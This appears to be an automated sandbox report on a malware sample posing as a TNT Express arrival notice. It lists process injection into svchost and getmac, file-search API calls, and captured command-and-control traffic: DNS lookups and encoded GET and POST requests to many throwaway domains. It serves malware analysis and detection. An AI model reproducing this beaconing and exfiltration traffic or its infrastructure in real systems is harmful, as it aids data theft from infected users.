Source:	Binary string: wntdll.pdbUGP source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1365362086.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1364162734.0000000003970000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459501826.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1457483219.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1563348781.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.000000000516E000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1565634565.0000000004E24000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1365362086.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000003.1364162734.0000000003970000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1459501826.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1563862530.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1457483219.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, getmac.exe, 00000004.00000003.1563348781.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3831888062.000000000516E000.00000040.00001000.00020000.00000000.sdmp, getmac.exe, 00000004.00000003.1565634565.0000000004E24000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: getmac.pdb source: svchost.exe, 00000002.00000003.1532379119.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532312542.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532391686.0000000002C3B000.00000004.00000020.00020000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000003.1905636199.000000000148B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: getmac.exe, 00000004.00000002.3820332065.0000000003286000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000055FC000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000002F7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1857846870.0000000029ADC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: getmac.exe, 00000004.00000002.3820332065.0000000003286000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000055FC000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000002F7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1857846870.0000000029ADC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: getmac.pdbGCTL source: svchost.exe, 00000002.00000003.1532379119.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532312542.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532391686.0000000002C3B000.00000004.00000020.00020000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000003.1905636199.000000000148B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0092DBBE
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008FC2A2 FindFirstFileExW,	0_2_008FC2A2
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_009368EE FindFirstFileW,FindClose,	0_2_009368EE
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0093698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0093698F
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0092D076
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0092D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0092D3A9
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00939642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00939642
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0093979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093979D
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00939B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00939B2B
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00935C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00935C97
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030CC560 FindFirstFileW,FindNextFileW,FindClose,	4_2_030CC560

Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4x nop then xor eax, eax	4_2_030B9C70
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4x nop then pop edi	4_2_030BE18A
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_04E7046C

Source: Joe Sandbox View	IP Address: 45.33.30.197 45.33.30.197
Source: Joe Sandbox View	IP Address: 45.33.30.197 45.33.30.197
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0093CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0093CE44

Source: global traffic	HTTP traffic detected: GET /w66n/?K4G=Thy4J4VXH8ud&wLTtn0=JNMn5wU33n82w51+xRzP3FlJSWcCaURVt+q7Pzr5OEhwI1ARCPGXZ34z1Qjm/zGtz6t2DMTKfskelbcwOWJ0KoKtKPXvtVz2A+q24UxvxXdwB5cNRWCJTn4Hp/JjmuKwWpo8eZEk+KzL HTTP/1.1Host: www.gloryastore.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6ocx/?wLTtn0=hijuOzLOQlrNWhILDNjeC2OH6zMrFQvwuW3+4wEUbqCXhGLxNrCetU+rFrrSd83NXlirQtkmZIjYEy1tPN82iVSiaciSCzMEBxKMdwnmzNSLD956QarfOOVQaIraEhcGUwHoQWWdHKAj&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m6nq/?K4G=Thy4J4VXH8ud&wLTtn0=zfe+8k3bS3VTyENDrpF5tYJUZKPBLxR5wPaRUhpCE/x49LgHC8jRfkvEkrDb2LyzQFIzQRxmXUwtO/OzOk2/N35cr/8qdVoH1F+0m51iVj8GFRVyh7gePfV4yv4xP9Sp9ECtryCPPQ+d HTTP/1.1Host: www.meetfactory.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY+O24D8hqBfRocJb7yxCDA6KFINoFi4IC1nHRAbEj+/fbu8m+QV1lpDHaccqqOhwbUbbUBhji0hskW+bSOHo9JJy3p6Ubdn+lA5+hwokaA&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.4u2b.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rjww/?K4G=Thy4J4VXH8ud&wLTtn0=21zhRHunkB6shXZDfVa1IsVwudiixK5d3l6Vv+2nLWpIaLBNoWu9aD0tgf5vArfoCL+2Np1WrTWVfntjgCU3jUG2yRIwUncgKO1dl+GE08PDbgeYNYZmHf3Eb1jWzI45ZCCGJ+uwj6f0 HTTP/1.1Host: www.7ddw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /l8y2/?wLTtn0=N7+ErdMNi9jLXETIvOCQ72nB9fpjFBOAyZNeO0Rg3M8w3pAJDP1ag+bhPLbHl+sxFhu1gT5MnEPxV82xgAHVuybS9IiKiGQkxKNSomt8mrNqSTPrwHmQNW0cpyJUmmeq46PNHGSVyG+Q&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.ytonetgearhub.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b7sv/?wLTtn0=w7j+gD0yrGg+rgg3b6bLH7LoNFIL2ZRfENl9mqI9AC3R/98OKlGHnvaLbHep/+eemtfpjPP4Y6n9+8uf6pj6QD92ZXReQewt6rCbHY9ZCpeEqDf5+CBDawRdjYLjTy83wviiXvFDQD/z&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.izen.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bkj6/?wLTtn0=8+n74ICH5t2dNKQX6lGuEwogKdFcm+efCN+AaJVQ/oTJ/vS0JBNmwd2cButyC47RBhZlYQKvXK9jQKf8mEf8lv7WjUOFxC32M8Dim1Z9UGO50WC+y5zJBQxNdJ1dbpIzCXRAAg7Lwi8E&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.mtmoriacolives.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vqrt/?K4G=Thy4J4VXH8ud&wLTtn0=D/CAr8v9sBwvGeAKv008oI0MjkBGAgxM5KXsmTnzco65i9w0O1N9X/hR5jUEVoZZmkU0lOgyZlyiO279G0EZ3YYBGdvyfs1xlWPG3pHzKgtCQbUQmbM2bRnHZTpJhRrpw4VoqiQ7Sy5/ HTTP/1.1Host: www.zippio.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9rz8/?wLTtn0=1tNn+IIyVW1A+sqKfEQy04NS/ZRVpIAq0YPUAX7Hfg7Vkl0yzx5JyzOVFmasMRZI7I9GTVzgvvzAn0zvpweIE6n4FW+v1Etr1hIa7dN5V1blzPzjU/O8FybgPZzZOf2wgBLswD1Be9R7&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.iqejgn.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /u6by/?wLTtn0=Dgyy682ZoHxveMZk4QaM25kax6qdmalts1J5/prtzj+Aj121xn42JvEKKfsZxRJ9g864IpRnQiIzJbkQp123GayICJ5t871z+USYFJdFSkTRN67PbuVXFd9aYnYsNcOxPieDa3nrDHGu&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.ahabet.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9g78/?wLTtn0=X+BV2nsKYVO3UqYl5ZWo6jPzEbzXOI/Udo1sM5SItc9KlA6rxUMBXJvyY6Ftxpnu0wvQfLKpLy/FUSg1jobB/8nbOfP/D3DNJAGczSyXrwslR190ihSqsuv2aECoMONlQwFokBCzbjwv&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.smashcoin.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW+QP5HF1VJp/R08/Tqyg6Y00c2I58wx0m/NKkc0ysAREJ2Ci+Jjsm2cVr9QKi8fHV5UgR9LrsAxuveq5wSVQj9G/u0V6Yivcjv0tzcPmEGWRNPAX/WIcmzgPK&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.keswickstream.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6ujs/?wLTtn0=yJkjCVuH35Z3Y4uWL4mXIpKsUoOhw5Ntfm93bfMPuqWkl8sQ3LA1Sv6pqP1navOonkOYgjHPfG96mMYvY8eBIuOm214hMSjoqIkQFvMydMaNRvs9I/qBWmD1+lOL1Msb2HletZybPt30&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.6666580a9.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /utgc/?wLTtn0=wywWfBrqEdu4Of0TGEXMpEnOank3eKh3frnML9uPnZ50Hwei4kKrO+8lS3f85dqDgJqwK6NjtdU1r4NauGv8+KUsgFrnvd2uJsLHZkaBWadbzfXU0G4TBiNKrnt/a6K4Cjqq35RngOKd&K4G=Thy4J4VXH8ud HTTP/1.1Host: www.moodplay.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: www.gloryastore.site
Source: global traffic	DNS traffic detected: DNS query: www.ayypromo.shop
Source: global traffic	DNS traffic detected: DNS query: www.meetfactory.biz
Source: global traffic	DNS traffic detected: DNS query: www.4u2b.online
Source: global traffic	DNS traffic detected: DNS query: www.7ddw.top
Source: global traffic	DNS traffic detected: DNS query: www.ytonetgearhub.shop
Source: global traffic	DNS traffic detected: DNS query: www.izen.group
Source: global traffic	DNS traffic detected: DNS query: www.mtmoriacolives.store
Source: global traffic	DNS traffic detected: DNS query: www.zippio.top
Source: global traffic	DNS traffic detected: DNS query: www.iqejgn.asia
Source: global traffic	DNS traffic detected: DNS query: www.kej-sii.cloud
Source: global traffic	DNS traffic detected: DNS query: www.ahabet.asia
Source: global traffic	DNS traffic detected: DNS query: www.smashcoin.club
Source: global traffic	DNS traffic detected: DNS query: www.keswickstream.online
Source: global traffic	DNS traffic detected: DNS query: www.6666580a9.shop
Source: global traffic	DNS traffic detected: DNS query: www.moodplay.store

Source: unknown

HTTP traffic detected: POST /6ocx/ HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 219Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheOrigin: http://www.ayypromo.shopReferer: http://www.ayypromo.shop/6ocx/User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Data Raw: 77 4c 54 74 6e 30 3d 73 67 4c 4f 4e 44 71 4e 4a 6b 54 64 51 79 67 68 44 50 33 5a 4b 78 54 61 7a 31 74 54 4f 43 50 57 71 6b 72 33 70 46 74 33 63 64 71 61 72 56 66 71 50 35 57 49 68 68 6d 50 4f 70 66 63 62 4d 48 33 58 45 4f 47 52 4b 74 55 42 38 75 33 45 78 38 41 48 76 6b 48 71 57 65 75 4a 63 2b 2f 46 78 55 2b 63 6e 48 54 54 47 6e 4f 6c 70 43 32 4d 4a 34 51 4e 70 4b 5a 48 61 59 49 59 36 72 33 4f 67 63 61 5a 6a 79 44 44 32 37 48 65 38 63 47 38 5a 71 71 77 78 32 6b 74 61 77 43 36 43 63 74 32 4c 2f 39 32 4b 47 47 50 35 4f 31 6d 30 49 36 45 59 51 7a 30 32 4c 4d 74 71 57 79 39 44 58 57 62 55 58 7a 2f 53 35 66 37 2f 4b 57 79 50 73 43 31 4a 4f 63 30 67 3d 3d Data Ascii: wLTtn0=sgLONDqNJkTdQyghDP3ZKxTaz1tTOCPWqkr3pFt3cdqarVfqP5WIhhmPOpfcbMH3XEOGRKtUB8u3Ex8AHvkHqWeuJc+/FxU+cnHTTGnOlpC2MJ4QNpKZHaYIY6r3OgcaZjyDD27He8cG8Zqqwx2ktawC6Cct2L/92KGGP5O1m0I6EYQz02LMtqWy9DXWbUXz/S5f7/KWyPsC1JOc0g==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 06 Aug 2024 05:56:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-06T05:56:59.2446784Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 06 Aug 2024 05:56:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-06T05:56:59.2446784Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=GxmQO4P11ib7m2UQwyqp; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:10 GMTDate: Tue, 06 Aug 2024 05:57:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=JaW3ckuFKJJD1niqv9DW; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:13 GMTDate: Tue, 06 Aug 2024 05:57:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=frSk9WypOjQSJnKbsh9q; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:15 GMTDate: Tue, 06 Aug 2024 05:57:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 